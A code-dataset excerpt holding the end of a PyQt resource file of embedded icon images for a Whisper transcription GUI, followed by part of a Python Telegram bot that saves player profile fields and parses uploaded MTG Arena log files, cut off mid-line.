\\xbf\\x9afU=n\\xdf\\xbe\\\n\\x8dW'N\\xc0\\x81\\xfd\\xfb\\x15\\x19\\xef\\xbe\\xfb\\xbbc\\xc4\\\n\\x0b\\xa3\\x14\\x19\\x8b\\x10B\\x08\\x05\\xb4\\x84\\x10\\x89||}\\\n1\\xe8\\x11\\xe3\\xb9\\xb4\\x00p\\xe6\\xcci\\x8c\\x1c\\xf1\\x1c\\xf2\\\n\\xf2\\xf2\\xaaaV\\xd6w\\xe7\\xce\\x1dLzm\\x22~\\xff\\\nm\\xaf\\x22\\xe3\\xc5'$`\\xfa\\x8cYP\\xa9T\\x8a\\x8c\\\nG\\x08!\\x04P\\xe9t:]MO\\x82\\x10b\\x1bn\\\n\\xde,\\xc6\\x83\\x03\\xfa\\xe1zn\\xae\\xc9s\\x83\\x83\\x83\\xf1\\\n\\xe1\\xdc\\x8f\\x91\\x98\\xd8\\xb4\\x1aff\\x1d%%%x\\xe3\\\n\\xf5W\\x15\\x0bf\\xeb\\xd6\\x0d\\xc4W\\xab\\xd7P\\xde,!\\\n\\x84(\\x8cVh\\x09!\\x92yxxb\\xe4\\xa8\\xd1\\x92\\\n\\xce\\xcd\\xc9\\xc9\\xc1\\xf3\\xc3\\x87a\\xf3O\\x9b\\xac<+\\xeb\\\n\\xc8\\xc9\\xc9\\xc13O?\\xa9X0\\xeb\\xe9\\xe9\\x89\\xcf\\x16\\\n,\\xa4`\\x96\\x10B\\xac\\x80Vh\\x09!f\\xd1j\\xb5\\\nx\\xe2\\xf1Gp65U\\xf2{\\xba\\xddw?\\xdex\\\n\\xf3m\\x04\\x04\\x04Xqf\\xca9s\\xfa\\x14^\\x1a;\\\nF\\x91\\x96\\xb6\\x00P\\xa7N\\x1d,X\\xb4\\x04\\xcd\\x9a\\xb7\\\nPd}kz*\\xa4\\x06\\x15\\x17\\x17#\\\n00\\x10\\xa5\\xa5\\xa5\\x00\\xee>M\\x18>|8&L\\\n\\x98\\x80\\xfa\\xf5\\xebW\\x9e\\xb7x\\xf1b\\x8c\\x1c9\\x92{\\\n\\xff\\xe6\\xcd\\x9b\\xd1\\xb7/\\xfd\\x0e\\x11b\\x09j\\xac@\\x08\\\nQ\\xd4\\xa8\\x17\\xc7\\xe0\\xfd\\x99\\x1f\\xc0\\xd5\\xd5\\xb5\\xa6\\xa7b\\\nU\\xed;t\\xc4w?\\xae\\xa7`\\x96\\xc0\\xd3\\xd3\\x13\\xdd\\\n\\xbbw\\xaf\\xfc\\xb9\\xb8\\xb8\\x18\\x9f~\\xfa)\\x1a6l\\x88\\\n\\xfe\\xfd\\xfb\\xe3\\xd0\\xa1C\\xd8\\xb8q#^|\\xf1E\\xd1\\\n\\xf7gggW\\xd7T\\x09\\xb1[\\x14\\xd0\\x12B\\x14\\xd7\\\n\\xbbO_,\\xfdr9\\xc2#\\x22jz*\\x8a\\xf3\\xf0\\\n\\xf0\\xc4\\x94i\\xef\\xe2\\xf3\\x85\\x8b\\x11\\x1c\\x1c\\x5c\\xd3\\xd3!\\\n\\xb5\\xc4\\xc0\\x81\\x03\\xb9cZ\\xad\\x16\\x9b7oF\\xdb\\xb6\\\nm1h\\xd0 TTT\\x88\\xbe\\x97\\x02ZB,G\\\n\\x01-!\\xc4*\\x12\\x9b&a\\xcd\\xf7k\\xf1\\xe0C\\xfc\\\n\\x17\\xbd-R\\xab\\xd5x\\xf0\\xa1\\x81X\\xb7q\\x93\\xdd\\xfc\\\n7\\x11\\xe5\\xf4\\xef\\xdf\\xdfh\\xa5\\x02c\\x1b\\x13)\\xa0%\\\n\\xc4r\\x14\\xd0\\x12B\\xac\\xc6\\xc3\\xc3\\x03S\\xa6\\xbd\\x8bO\\\n\\xe7/@\\xbd\\xc8\\xc8\\x9a\\x9e\\x8el\\x9d;\\xdf\\x83\\xef~\\\n\\x5c\\x87)\\xd3\\xdeE``PMO\\x87\\xd4B\\x01\\x01\\\n\\x01\\xe8\\xda\\xb5\\xab\\xac\\xf7\\xfe\\xfd\\xf7\\xdf8x\\xf0 \\xca\\\n\\xcb\\xcb\\x95\\x9d\\x14!\\x0e\\x846\\x85\\x11B\\xaaEyy\\\n9V\\x7f\\xfd\\x15\\xbe\\xf8b\\x09Jn\\xde\\xac\\xe9\\xe9H\\\n\\xd2\\xa2e+\\x8c\\x1c\\xfd\\x22Z\\xb5j]\\xd3S!6\\\n`\\xc1\\x82\\x05\\x06\\xf3d\\xa5prrB\\xe3\\xc6\\x8d\\xd1\\\n\\xa9S't\\xec\\xd8\\x11-[\\xb6D||Q@K\\x08\\xa9V\\x85\\x05\\x05X\\\n\\xfd\\xcd\\xd7\\xf8n\\xcdj\\xdc\\xb8q\\xa3\\xa6\\xa7\\xc3Q\\xa9\\\nTh\\xd7\\xbe\\x03\\x9e{~\\x04\\x9a\\xb7hY\\xd3\\xd3!\\\n6$++\\x0b\\x11\\x11\\x11\\x16w\\xcd\\xab*00\\x10\\\nm\\xdb\\xb6E\\xdb\\xb6m1~\\xfcxxzV_{\\\nhBl\\x09\\x05\\xb4\\x84\\x90\\x1aq\\xf3f16\\xae_\\\n\\x8f\\xf5\\xeb\\xd6\\xe2\\xc2\\x85\\xf35=\\x1d\\xf8\\xf8\\xfa\\xa2\\x7f\\\n\\xff\\x070p\\xd0#\\x88\\x8a\\x8a\\xaa\\xe9\\xe9\\x10\\x1bt\\xe6\\\n\\xcc\\x19t\\xe8\\xd0\\x01\\xf9\\xf9\\xf9\\x8a\\x8e\\x1b\\x1a\\x1a\\x8a\\x15\\\n+V\\xa0G\\x8f\\x1e\\x8a\\x8eK\\x88=\\xa1\\x80\\x96\\x10R\\\n\\xe3\\x8e\\xa7\\xa4\\xe0\\xe7\\xcd\\x9b\\xf0\\xdb\\xde=\\xd5\\xda\\xd7\\xde\\\n\\xdb\\xdb\\x1b]\\xba\\xde\\x8bn\\xf7\\xdd\\x8f\\xf6\\x1d:\\xc2\\xc5\\\n\\xc5\\xa5\\xda>\\x9b\\xd8\\x97U\\xabVa\\xf4\\xe8\\xd1\\xb8\\xa9\\\np:M\\xcf\\x9e=\\xb1b\\xc5\\x0a\\x84\\x84\\x84(:.\\\n!\\xf6\\x86\\x02ZBH\\xad\\xa1\\xd3\\xe9p\\xe6\\xf4i\\xec\\\n\\xdb\\xf7\\x1bR\\x8e\\x1d\\xc3\\xf1\\x94c(..Vl|\\\n777$6MB\\xab\\xd6\\xad\\xd1\\xbau\\x1b$6\\\nM2\\xba3\\x9d\\x10Srss\\xf1\\xdcs\\xcfa\\xe3\\\n\\xc6\\x8d\\x8a\\x8e\\xeb\\xe6\\xe6\\x86\\x993gb\\xdc\\xb8q\\x94\\\nCK\\x88\\x04\\x14\\xd0\\x12Bj-\\xadV\\x8b\\xf4\\xf44\\\n\\xa4\\xa7\\xa5\\xe1bF\\x0622\\xd2q5'\\x07yy\\\ny\\xc8\\xcf\\xcfCii)JJJ*\\xcf\\xf7\\xf2\\xf2\\\n\\x82\\x9b\\x9b\\x1b<<=\\x11\\x12\\x1c\\x82\\xa0\\xe0`\\x84\\x86\\\n\\x85\\xa1a\\xc3h4\\x8e\\x8dEDD=\\xa8\\xd5T\\xdc\\\n\\x85(c\\xc7\\x8e\\x1d\\x186l\\x18233\\x15\\x1d7\\\n11\\x11\\xabW\\xafF\\xd3\\xa6M\\x15\\x1d\\x97\\x10{F\\\n\\x01-!\\x84\\x10b\\x86\\xb2\\xb22L\\x9d:\\x15\\x1f~\\\n\\xf8\\xa1\\xa2\\x1b\\xc0T*\\x15\\xc6\\x8e\\x1d\\x8b\\xd9\\xb3g\\xdb\\\n}\\xa7=B\\x94F\\xcf\\xda\\x08!\\x84\\x10\\x89N\\x9e<\\\n\\x89!C\\x86 %%E\\xf1\\xb1?\\xf8\\xe0\\x03\\xbc\\xfa\\\n\\xea\\xab\\x8a\\x8fK\\x88#\\xa0go\\x84\\x10B\\x88D\\x1a\\\n\\x8d\\x06c\\xc6\\x8c\\xc1\\xb3\\xcf>\\x8b\\xc4\\xc4Dh4\\x1a\\\n\\xc5\\xc6>~\\xfc\\xb8bc\\x11\\xe2h(\\xe5\\x80\\x10B\\\n\\x08\\x91\\xa9\\xb8\\xb8\\x18\\xc7\\x8e\\x1d\\xc3\\xe1\\xc3\\x87q\\xf8\\xf0\\\na\\xfc\\xfe\\xfb\\xef\\xc8\\xc8\\xc8\\x905\\x96\\xaf\\xaf/rr\\\nr\\xa8\\xda\\x06!2P@K\\x08!\\x84(h\\xef\\xde\\\n\\xbd\\xb2\\xdb\\xe0n\\xdd\\xba\\x15={\\xf6TvB\\x848\\\n\\x00J9 \\x84\\x10B\\x14\\x94\\x90\\x90 \\xfb\\xbd\\xeb\\xd6\\\n\\xadSp&\\x848\\x0eZ\\xa1%\\x84\\x10B\\x14\\xa4\\xd3\\\n\\xe9P\\xa7N\\x1d\\x94\\x97\\x97\\x8b\\xbe\\x1e\\x13\\x13\\x83s\\xe7\\\n\\xce\\x89\\xbe\\x16\\x14\\x14\\x84+W\\xae(\\x9a\\x9bK\\x88#\\\n\\xa0\\x15ZB\\x08!DA*\\x95\\x0a\\xc1\\xc1\\xc1\\xa2\\xaf\\\n\\x0d\\x1d:\\x14\\xa9\\xa9\\xa98|\\xf80\\x86\\x0e\\x1d\\xca\\x05\\\n\\xaeW\\xaf^\\xc5\\xbe}\\xfb\\xaac\\x9a\\x84\\xd8\\x15\\x0ah\\\n\\x09!\\x84\\x10\\x85\\x89\\xb5\\xaa\\xed\\xd7\\xaf\\x1f\\x96-[\\x06\\\n\\x95J\\x85\\x16-Z`\\xd5\\xaaU8{\\xf6,\\xc6\\x8d\\\n\\x1b\\x07ww\\xf7\\xca\\xf3\\xd6\\xaf__\\x9dS%\\xc4.\\\nP\\xca\\x01!\\x84\\x10\\xa2\\xb0\\x01\\x03\\x06\\xe0\\xa7\\x9f~\\xaa\\\n\\xfc\\xb9m\\xdb\\xb6\\xd8\\xb9s'<<\\xff\\xfcs\\xcc\\x9f?\\x1fnnn\\xb8t\\xe9\\\n\\x12\\xb5\\xbc%\\xc4\\x0c\\xb4BK\\x08!\\x84(\\xac\\xea\\x0a\\\nmBB\\x02~\\xf9\\xe5\\x17\\x83\\xc1,\\x00\\x04\\x06\\x06b\\\n\\xda\\xb4i\\xb8x\\xf1\\x22^\\x7f\\xfdu\\xfc\\xfb\\xef\\xbf\\xd5\\\n1MB\\xec\\x06u\\x0a#\\x84\\x10B\\x14\\x16\\x1a\\x1a\\x0a\\\n\\x00\\x88\\x88\\x88\\xc0\\x96-[\\xe0\\xe7\\xe7'\\xe9}\\x1e\\x1e\\\n\\x1e\\x183f\\x8c5\\xa7F\\x88]\\xa2\\x15ZB\\x08!\\\nDa!!!\\x08\\x08\\x08\\xc0\\xb6m\\xdb\\x10\\x19\\x19Y\\\n\\xd3\\xd3!\\xc4\\xeeQ\\x0e-!\\x84\\x10\\xa2\\xb0_\\x7f\\xfd\\\n\\x15\\xde\\xde\\xdeh\\xdf\\xbe}MO\\x85\\x10\\x87\\xf0?\\xfb\\\n\\xd1\\xebM\\x8e\\xe6\\xe1\\x0c\\x00\\x00\\x00\\x00IEND\\xae\\\nB`\\x82\\\n\\x00\\x00\\x0c`\\\n<\\\nsvg width=\\x22981\\x22 \\\nheight=\\x22986\\x22 xml\\\nns=\\x22http://www.w\\\n3.org/2000/svg\\x22 \\\nversion=\\x221.1\\x22>\\x0d\\x0a\\\n \\x0d\\x0a L\\\nayer 1\\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00&\\x19\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a\\\n \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a <\\\ng\\x0a id=\\x22#f4f0\\\ne9ff\\x22\\x0a trans\\\nform=\\x22translate(\\\n-28.77,-34.26442\\\n1)\\x22 />\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\\n\\x0a \\x0a \\\n \\x0a \\\n\\x0a\\x0a\\\n\\x00\\x00~s\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a <\\\ndefs\\x0d\\x0a id=\\x22d\\\nefs73\\x22>\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a\\\n \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a\\\n \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#ffffff\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 432\\\n.34,374.43 c 1.0\\\n5,-0.05 2.1,-0.0\\\n9 3.16,-0.12 0.2\\\n1,1.22 0.42,2.45\\\n 0.64,3.68 -0.79\\\n,-0.02 -2.35,-0.\\\n06 -3.14,-0.08 -\\\n0.22,-1.16 -0.44\\\n,-2.32 -0.66,-3.\\\n48 z\\x22\\x0d\\x0a id\\\n=\\x22path16\\x22\\x0d\\x0a \\\n style=\\x22fill:ur\\\nl(#linearGradien\\\nt73)\\x22 />\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#ffffff\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 244\\\n.22,466.28 c 21.\\\n83,1.19 43.72,-1\\\n.14 65.52,0.7 -1\\\n.03,4.12 1.05,11\\\n.54 -4.19,13.34 \\\n-13.07,2.31 -26.\\\n4,0.44 -39.56,1.\\\n61 -0.02,12.56 -\\\n0.05,25.14 0.25,\\\n37.71 14.01,-0.4\\\n9 28.06,-1.01 42\\\n.05,0.25 1.34,5.\\\n09 1.4,10.36 0.1\\\n1,15.5 -19.44,-0\\\n.06 -38.89,0 -58\\\n.32,0.01 -4.7,0.\\\n25 -5.32,-5.69 -\\\n5.51,-9.04 -1.24\\\n,-20 -0.56,-40.0\\\n6 -0.35,-60.08 z\\\n\\x22\\x0d\\x0a id=\\x22pa\\\nth32\\x22\\x0d\\x0a st\\\nyle=\\x22fill:url(#l\\\ninearGradient73)\\\n\\x22 />\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\\n\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\\n\\x0a \\\n\\x0d\\x0a \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#ffffff\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 579\\\n.03,597.47 c 0.8\\\n3,3.66 0.95,7.42\\\n 1.12,11.17 -1.9\\\n8,-1.77 -3.85,-3\\\n.65 -5.7,-5.53 1\\\n.49,-1.91 3.01,-\\\n3.8 4.58,-5.64 z\\\n\\x22\\x0d\\x0a id=\\x22pa\\\nth49\\x22\\x0d\\x0a st\\\nyle=\\x22fill:url(#l\\\ninearGradient73)\\\n\\x22 />\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n\\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#ffffff\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 405\\\n.47,770.53 c 0.6\\\n2,-0.17 1.85,-0.\\\n5 2.46,-0.67 0.0\\\n3,1.38 0.06,2.77\\\n 0.1,4.16 -0.8,-\\\n0.02 -2.38,-0.06\\\n -3.18,-0.09 0.2\\\n,-1.14 0.41,-2.2\\\n8 0.62,-3.4 z\\x22\\x0d\\x0a\\\n id=\\x22path7\\\n1\\x22\\x0d\\x0a style\\\n=\\x22fill:url(#line\\\narGradient73)\\x22 /\\\n>\\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\\n\\x0d\\x0a\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x08\\\n\\x0c\\xa6\\xc7\\x95\\\n\\x00r\\\n\\x00e\\x00s\\x00o\\x00u\\x00r\\x00c\\x00e\\\n\\x00\\x05\\\n\\x00P7\\xd5\\\n\\x00I\\\n\\x00m\\x00a\\x00g\\x00e\\\n\\x00\\x0b\\\n\\x06>\\xbb\\x87\\\n\\x00w\\\n\\x00h\\x00i\\x00s\\x00p\\x00e\\x00r\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0f\\\n\\x07\\xa7h\\x87\\\n\\x00s\\\n\\x00p\\x00e\\x00a\\x00k\\x00_\\x00w\\x00h\\x00i\\x00t\\x00e\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x1d\\\n\\x08v\\xec\\xa7\\\n\\x00h\\\n\\x00u\\x00g\\x00g\\x00i\\x00n\\x00g\\x00f\\x00a\\x00c\\x00e\\x00_\\x00l\\x00o\\x00g\\x00o\\x00-\\\n\\x00n\\x00o\\x00b\\x00o\\x00r\\x00d\\x00e\\x00r\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x10\\\n\\x00\\xdeY\\xa7\\\n\\x00D\\\n\\x00e\\x00m\\x00u\\x00c\\x00s\\x00_\\x00b\\x00l\\x00a\\x00c\\x00k\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0e\\\n\\x08$\\xccg\\\n\\x00C\\\n\\x00a\\x00n\\x00c\\x00e\\x00l\\x00_\\x00r\\x00e\\x00d\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x13\\\n\\x01\\xd60'\\\n\\x00h\\\n\\x00e\\x00a\\x00d\\x00p\\x00h\\x00o\\x00n\\x00e\\x00_\\x00b\\x00l\\x00a\\x00c\\x00k\\x00.\\x00s\\\n\\x00v\\x00g\\\n\\x00\\x0f\\\n\\x00\\xa1\\x01'\\\n\\x00s\\\n\\x00p\\x00e\\x00a\\x00k\\x00_\\x00b\\x00l\\x00a\\x00c\\x00k\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0f\\\n\\x0d\\xaa\\xba\\xc7\\\n\\x00s\\\n\\x00p\\x00e\\x00a\\x00k\\x00-\\x001\\x006\\x00x\\x002\\x004\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x14\\\n\\x02&\\xc5'\\\n\\x00w\\\n\\x00a\\x00v\\x00e\\x00-\\x001\\x006\\x00x\\x001\\x006\\x00_\\x00b\\x00l\\x00a\\x00c\\x00k\\x00.\\\n\\x00s\\x00v\\x00g\\\n\\x00\\x14\\\n\\x05 \\xac\\x87\\\n\\x00w\\\n\\x00a\\x00v\\x00e\\x00-\\x001\\x006\\x00x\\x001\\x006\\x00_\\x00w\\x00h\\x00i\\x00t\\x00e\\x00.\\\n\\x00s\\x00v\\x00g\\\n\\x00\\x0e\\\n\\x0d\\x16\\x86G\\\n\\x00m\\\n\\x00i\\x00c\\x00r\\x00o\\x00p\\x00h\\x00o\\x00n\\x00e\\x00.\\x00p\\x00n\\x00g\\\n\\x00\\x10\\\n\\x07\\xe80\\x07\\\n\\x00D\\\n\\x00e\\x00m\\x00u\\x00c\\x00s\\x00_\\x00w\\x00h\\x00i\\x00t\\x00e\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x16\\\n\\x02pB\\x07\\\n\\x00S\\\n\\x00p\\x00l\\x00a\\x00s\\x00h\\x00S\\x00c\\x00r\\x00e\\x00e\\x00n\\x00_\\x000\\x00.\\x004\\x00.\\\n\\x000\\x00.\\x00p\\x00n\\x00g\\\n\\x00\\x15\\\n\\x04\\x951'\\\n\\x00r\\\n\\x00o\\x00b\\x00o\\x00t\\x00-\\x001\\x006\\x00x\\x001\\x006\\x00_\\x00b\\x00l\\x00a\\x00c\\x00k\\\n\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x11\\\n\\x0f\\x0c\\x9c\\xa7\\\n\\x00F\\\n\\x00a\\x00s\\x00t\\x00e\\x00r\\x00W\\x00h\\x00i\\x00s\\x00p\\x00e\\x00r\\x00.\\x00p\\x00n\\x00g\\\n\\\n\\x00\\x13\\\n\\x06\\xf0Y\\x87\\\n\\x00h\\\n\\x00e\\x00a\\x00d\\x00p\\x00h\\x00o\\x00n\\x00e\\x00_\\x00w\\x00h\\x00i\\x00t\\x00e\\x00.\\x00s\\\n\\x00v\\x00g\\\n\\x00\\x11\\\n\\x074\\x91\\xe7\\\n\\x00w\\\n\\x00h\\x00i\\x00s\\x00p\\x00e\\x00r\\x00-\\x001\\x006\\x00x\\x001\\x006\\x00.\\x00s\\x00v\\x00g\\\n\\\n\\x00\\x15\\\n\\x03\\xabX\\x87\\\n\\x00r\\\n\\x00o\\x00b\\x00o\\x00t\\x00-\\x001\\x006\\x00x\\x001\\x006\\x00_\\x00w\\x00h\\x00i\\x00t\\x00e\\\n\\x00.\\x00s\\x00v\\x00g\\\n\"\n\nqt_resource_struct = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x16\\x00\\x02\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xee\\x1b\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc7\\\n\\x00\\x00\\x00\\xa6\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00Sr\\\n\\x00\\x00\\x01\\x8bF<\\xc5\\xbf\\\n\\x00\\x00\\x00\\xee\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xdf\\x7f\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc0\\\n\\x00\\x00\\x01b\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x06\\x87\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc9\\\n\\x00\\x00\\x02\\x06\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xafi\\\n\\x00\\x00\\x01\\x8bM\\xaa\\x8b\\x8d\\\n\\x00\\x00\\x02\\xe4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x04\\xee[\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc4\\\n\\x00\\x00\\x028\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x03P\\xbb\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc2\\\n\\x00\\x00\\x01\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x16p\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xca\\\n\\x00\\x00\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x89\\xe5\\x97\\x971\\\n\\x00\\x00\\x02\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x04\\xbb\\xda\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc0\\\n\\x00\\x00\\x02\\xbc\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x04\\xc8>\\\n\\x00\\x00\\x01\\x89\\xe5\\xac\\xd5\\x85\\\n\\x00\\x00\\x00B\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00%~\\\n\\x00\\x00\\x01\\x8b\\x0a\\x1f]\\xc8\\\n\\x00\\x00\\x01\\xe0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01+e\\\n\\x00\\x00\\x01\\x8bF>ej\\\n\\x00\\x00\\x00\\xcc\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xd7v\\\n\\x00\\x00\\x01\\x89\\xfd\\x00\\x05i\\\n\\x00\\x00\\x00f\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x000\\x8f\\\n\\x00\\x00\\x01\\x89\\x930Z\\xc4\\\n\\x00\\x00\\x01\\xbe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01&Y\\\n\\x00\\x00\\x01\\x89\\x92\\xae\\xb4\\x99\\\n\\x00\\x00\\x01>\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xf9,\\\n\\x00\\x00\\x01\\x89\\xe5\\x93\\x8a\\xd1\\\n\\x00\\x00\\x02h\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x03\\xcf2\\\n\\x00\\x00\\x01\\x89\\xe6\\x05\\xa3h\\\n\"\n\ndef qInitResources():\n QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n","repo_name":"LeoWang329/fatser-whisper-GUI","sub_path":"resource/_rc/rc_Image.py","file_name":"rc_Image.py","file_ext":"py","file_size_in_byte":752967,"program_lang":"python","lang":"ja","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"72189612280","text":"import tables, strings, util, telegram\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update, ChatAction\nfrom peewee import *\nfrom emoji import emojize\nfrom telegram.ext import CallbackContext\nimport cacheable, json, os\nfrom datetime import date\n\n\ndef start_pvt(update: Update, context: CallbackContext):\n try:\n tables.User.get(tables.User.user_id == update.message.from_user.id)\n text = strings.Start.start_pvt\n except DoesNotExist:\n text = strings.Global.user_not_exist\n finally:\n text += strings.Start.start_id.format(update.message.from_user.id, update.message.chat_id)\n context.bot.send_message(chat_id=update.message.chat_id, text=text, parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@util.send_action(ChatAction.TYPING)\ndef dci(update: Update, context: CallbackContext):\n args = update.message.text.split(\" \")\n if len(args) == 1:\n text = strings.Dci.dci_invalid\n else:\n dci = args[1]\n try:\n if dci.isdigit() and not dci.startswith('-'):\n user = tables.User.get(tables.User.user_id == update.message.from_user.id)\n user.dci = dci\n user.save()\n text = strings.Dci.dci_set.format(dci)\n else:\n text = strings.Dci.dci_invalid\n except DoesNotExist:\n text = strings.Global.user_not_exist\n context.bot.send_message(chat_id=update.message.chat_id,\n text=text,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@util.send_action(ChatAction.TYPING)\ndef name(update: Update, context: CallbackContext):\n args = update.message.text.split(\" \", 1)\n if len(args) == 1:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Name.name_invalid,\n parse_mode=telegram.ParseMode.MARKDOWN)\n else:\n name = args[1]\n try:\n user = tables.User.get(tables.User.user_id == update.message.from_user.id)\n user.name = name\n user.save()\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Name.name_set.format(name),\n parse_mode=telegram.ParseMode.MARKDOWN)\n except DoesNotExist:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Global.user_not_exist,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@util.send_action(ChatAction.TYPING)\ndef arena(update: Update, context: CallbackContext):\n args = update.message.text.split(\" \", 1)\n if len(args) == 1:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Arena.arena_invalid,\n parse_mode=telegram.ParseMode.MARKDOWN)\n else:\n arena = args[1]\n try:\n user = tables.User.get(tables.User.user_id == update.message.from_user.id)\n user.arena = arena\n user.save()\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Arena.arena_set.format(arena),\n parse_mode=telegram.ParseMode.MARKDOWN)\n except DoesNotExist:\n context.bot.send_message(chat_id=update.message.chat_id,\n text=strings.Global.user_not_exist,\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n\n@util.send_action(ChatAction.TYPING)\ndef logparser(update: Update, context: CallbackContext):\n file_id = update.message.document.file_id\n newFile = context.bot.get_file(file_id)\n filename = './temp/{}.log'.format(update.message.from_user.id)\n newFile.download(filename)\n with open(filename, \"r\") as file:\n for line in file:\n if \"<== PlayerInventory.GetPlayerCardsV3\" in line:\n json_object = line[line.index(\"{\"):]\n player_cards = json.loads(json_object)\n # print(player_cards)\n if \"<== 